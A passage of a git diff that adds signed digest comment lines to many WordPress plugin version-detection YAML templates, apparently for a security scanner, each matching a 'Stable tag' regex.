4a0a00473045022100ea9310df066e744622cb4bac064920e8e5e1a13b3957140922da928ecf6dffe6022064fdc7f82f16f82bc5e298cd54a7de7fa06210c6d63b541e085f8ff58091a6a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..64471f9c12 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202154f21e4b042c9149f8b65247cfdd1989ecab22a64c9fa0a31682d1b1fbf80c022015893cc6ecb54e672874d2899237a0c30b12071a11e2855ab9c27f9482c74cd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..af2dc8ab5c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009668cc6356cea9e16c9715b1fd4fa4cd2b9dd6db86438ff223a9fab1ac6b6ece022100d248f37d321f6b8219eb5d249efb10d37a215b3898729cb17a012f407a01f51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..1ec2c6dd13 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070ce423da2cc6d6c837f29babe0d64ead5d6a030af4c26b7fca4442a4fc6021f0220086d6e1f3cc655f638d99586147f3981975830e51a9e6e681b312079600a637e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..a0a9068461 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008674227c0b35a86eaec27b25f82c48a83449db7752d1490ed99b3427e335fd5b022034b58279f5557da98e30a85b9397832c47adb0e9fc59d82c60ec4bca6be53fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..e497813ceb 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045f4cf2cbbdca2c0c1ffcb5aa4a87249470aef7725e3b1e4ba3f06c860a4b8a102204c9f3cdbce5d8246bd467f0777bcf4610b26c03f6e07e097f54e28d02d3eb86b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..12f00b3c25 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb854a5ff0fed535e28f6b3b3e982a9bb8788dea0d5f603062bc345d59d2eb0f022100bd9535badbb52aac6b3bd68dd7eaaa6fa5b5909846440e6267a5b5d416f02b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..34701e0b7a 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024beaa04b7882c8419dfda3073c5a784ab2c2b48c4b68a6196e51b192c4a731402200a5c8740a25c47f15f7efe2d9673ca1c53dc41326af35d1c4985d8390a438e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..7023e41331 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057808db9f22ce25bc9ec10680b4c7612d05a901c8808a461ede79f66b6b3ea12022078f8eb29be723f0bda3823a155fce1fa84a7bd2245f33b93a0c1b2eef018e887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..4b0711f504 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aeb3c433a63870b21ada1c801b08333161956c2344f0a60b83e0d2435bf774c302206fb64c3a694b4001e399a6765c1650b6ea9825d208647b573f8e1e429ab3b7c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..a6ff8bcae9 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201423476330f96a852fe2cc639a893dcd4a0b5ed6d66fecc5c2032cc0a427518f02207bb6a507e9ca4a14d97f4ba8663ac0a1335bb2c7fca4a2c5a590f520bc46cbac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..7d00dd9b8b 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b89287a79b14530749a141a17ce2c5cd16b9e7e39f1e97b5fca004c5a31c56d02210084df08b8e1cccac7464f84945b0730601841af7b0fd328f946d15d1910360829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..e90d81dd81 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e15b608be823de0b91fef5725713b4560490deeaa927834de31b467f4b1ce040022100a93396384c19b32c895ea04ff8d7ccdf3de4a913314ec327437c5efaeef70477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..16b85e713e 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d94da120a60b23a7f31192657501efcb718b410d519f91d670beb2e726c588302200d5820dd4b9ffa6d535d84ec1ffd2f6869fab49240018996889a99eec8a86c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..5190fd3776 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203877c251237f1b78a60033b615e9691385935012619b1045c12ba319f24f58aa022059402499e78eeef1d874b8962502bdbbbb6b92b7ee48a618666ad83ec5267663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..d05fe6fea9 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bff746a424430951de7cb5b16395507797ddf8ddc584319281b63845691d2dbb02205cfc9a4c7fcdfad1590ab1666bf5b74bcd962fd17ba04f31aca3c68e1791f73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..812c8a2cf6 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2f5b3f4e504bdb8a0954ac0f946df439b61abc62c0fc2d43186fe0b63fa19f40221009f1a4f806647e4eb575d8b247988ebe446194551859af652205ac6ddb5ab3cae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..e2cd021086 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207313a355cfb85ddeac6bfa05e73a498f3edd44ccc67c713409b713e6d736162502205a51630503d393ba65f858f701bc2425de631442c12460afa8286684f1bea5f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..0ba9cfafec 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc9cb7a942485f086c12a2e6cfdb8ee6d84bde39b9ec9bb3cad41cac8cc6f49f02201856d40e1d3e163dbbf714004587075fdb42654d251070224e69b17f83df5f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..3c6a3830ce 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c737be661a0fae3a3f6cf006b006882e7dded4fb38c86cca848e68bee221190022071502112e2085d8cef5b46691eb1c35841f208d92f3a66b7212ca9500117c7e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..a8f3f61d2c 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ccded132e64475fd0d897076fe33a20bc9eaf4a7b5b2625cc84ba97015ccf3340221009d665e0fda9fff8e9d1549ded0cb6065a03e962187dadf81d6d27d0666fc438d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..4b6ef32fe4 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206341c909bb55e82d0eb80a22fd772b5ad01443f3c78afe6733a513e48bf4f5f102204fd740863b038dd42e399e674c78486c06a221f8b48b352821beaee4eb929325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..e160c8c6f8 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1f9194438a57ef38a09f9b096f406c0ac76863564680f9da531be623df969360220380a8d7d1125a9b14fa9d2c3b996beee7fa3520bfccee2d284536ebc379995ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..ff813aad3b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220168e3f618beac1a287ef9ad39d2ca54a2147ee9de5d492d85b81a24b1b230dba0221008f7549550a13975c7049b2564cb6c5cf75ac202b748d27b919da8f92956da1d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..30f60d741b 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009a0a6bce819015435c7a5d9aa3ffbfbfa6ffc5de3f9ace06d7d63908c61896b2022100f82e368835347b70338b7066bd77393e411142cb518eb4d78eea6f966acf9291:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..c0d0dc3823 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ecf47ae98fd2b24fdf29772a60b9cad30a5f430428807600c1e02dc1133f2bd0220640c7277b1d28b8f4fb1bb77a3ef4896ecac27919637c3ab8c200f29ec07e6fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..4704727f6a 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e83911ec48374cbd4cd8ff30baf703bdcf73a22e34a5c7cfe522fd7354ae616022100f56347ff9c84e5d3c0ff5fdb13aef15c3b361e7f9d0a81090f1b5ae2bd487d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..326e986f9c 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b59f9aa912618cb9781937b6ae0b4080c355884c8ccc379aa0d0a1582d8d41a8022100b9421c497ad5f8f7ca5ce9fc3f612a0bbae4efd008d6800b01f9dca4072f9c23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..699c1d7e72 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207121c37459760def8c49410c299a238db784e369d9bb7b1fdb60e5c64907d87f0220768c62c2a33a329690df4d1580da1e2c216518d1f17c25a79b66c679e9af5903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..69c58d09ae 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a15a9d6f3cc67524c4263769de30c6c4694e5ca1cf2fa1b15021f71b1741161a022100ff6c28345eaae99a50529916c445e172f764e3f5571e0672c1b5a3bb78288130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..ddb240aa09 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022059f4f853c2c20528a64e8c0c6e15a9919ee6a95a68518d6cb966939560a38666022100e20e2e5acceb14a973406505cf5f5428dd0ec5d6d18dd195ceb0beb421d05a88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..db2b1099f0 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d2deae583de7d55d7f1a88a0eefdaba554802528408228f60c4fbd41115a2d7d022100e41841fd2dd3edbe8953e5de435cc0070aedbad5b8ae585da2eefafd7e7d406c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..8bfaa5b280 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b085549d9abb8cbfc4042550dbe8cffea3b1c69ce22f88a8d77f083d03e94ae02201d4f042b64fb9af1b9c8a047bd1adbf11f585a1266254b3901fac3f621d56893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..727451b7d8 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203383e298cc9c2a3c974d2282f0de0a45a68a352e200351b56e9bd0f3aee6429502210093ca998d3fe2766cfa42da6d3d8523e3aec1504f4fcb3171628ee7e14a2387c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..21fb18231f 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220104d82f69a57372bbcd1867f2760d54c8b0f832ace98d0e0f4ecdb20e446dfc0022052790f76f889553916454fb402166569b5c06e251a17cbafc16ee5bba32e572e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..70863b703d 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220042f9cc324f1b236aae497acb0093c785e22fdee30443019f570bc1c762ba9ee02207804a124519a0261253a8c9269a6960c6076d3090e546380fe6839dbbbe6d2a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..113e4b30ce 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4737a90496ccc1dfacbfad4cd63941526f73f329b161ab0bbe66a879cc57f1d022100f81af63fedbb770a4a8877f7c6ad2bee006a656e55bfa941c4ba341d75b64a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..898cd70b08 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f174610a7c8dfd08b03f253fbf664e18afca6e8e2aef63a0cc725bdb5f8ad1a02203687d5c574d34edca1ec139d644a30f6b032b4874ce22cae87883562c6c89af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..d9c9734ca2 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a977391007e31e34417991906af0e722dd5c3055c157e289f6ff7a9e056bf63a02204396a2ef9cd5bd3321e78efa7751adee6469ef461f2131f05f8bc057ccb15040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..8688b5b4fe 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a281f669bc5401da541562492e1d213a2b539d8abb88fa752b98bf4947905cf702205ffc72d16c73a85cabc347ef588fb91239678f29a1110cdc8b1daa818ed0af1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..d9a875dec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085b3190febc21052f5b817f68c3f9d256968f40f9c455f547235d6a7e062c45b022100f6d775e9ede029f1e28c1603140959f93a0d48661d43050e725f73984638394b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..cd7bf8f53c 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aca131cbc3814415079827c191bec32374a6d5455593edcbdc0ee70ddefe5b250220765bec11b882a67a0c5de786f540d8cf95425953be8ce2fa6d69eae4aa95ff1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..a44017fe1f 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5256fef8bfe47582c9c44a66db7da639e723c173654d50299ac326ae3470e6e022042540df91729bb981e0a6c157370a9f4257540a88886972a775614737626eac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..dbb15ed000 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203736554d07833fd7fefbef2194a2cf582ded34203e7b1b7b959c8fdbeaad1809022100e8fe263fb147421433941966a263dcabc8a00c2b51095abf10dd4b2562317ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..95e568017c 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210088acb6063e2c9a3020816b1164569d77c9ad5c254d968b5f3b71d4ed46fb3b1b0220064747dec3b652ebef681016de711ca9b8755c80b522554838e9fb0373531125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..e35d78595a 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a91028b11ae9383db56ad21df17e2ec58c86c3cf0c2436aecdd09a2af63a0e7022100ec427b4a9cbb981f2e38c1d14f1d88a72c7d41e49f0b9c10651f1fad3f1cb299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..6b91e94952 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204c0c0766cbe7b82372c41eb6875ad3c5f5e2a464e08e8d73e08904e09751028c022100d491504222c303d0ccf6bea2d0ff881458de0336c8a238dbf19ecbbc1b94c789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..9b24d42c96 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2586dbe1e3760fdcc35998d1f4a7ab642493f6eaa95b03aa8f5bbecdddf0c5c02204d6b2def35f807d24eaa59cd4f35f9cb927872fdbbee4fa0360ed42ef6b0d75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..5f2f45d863 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ 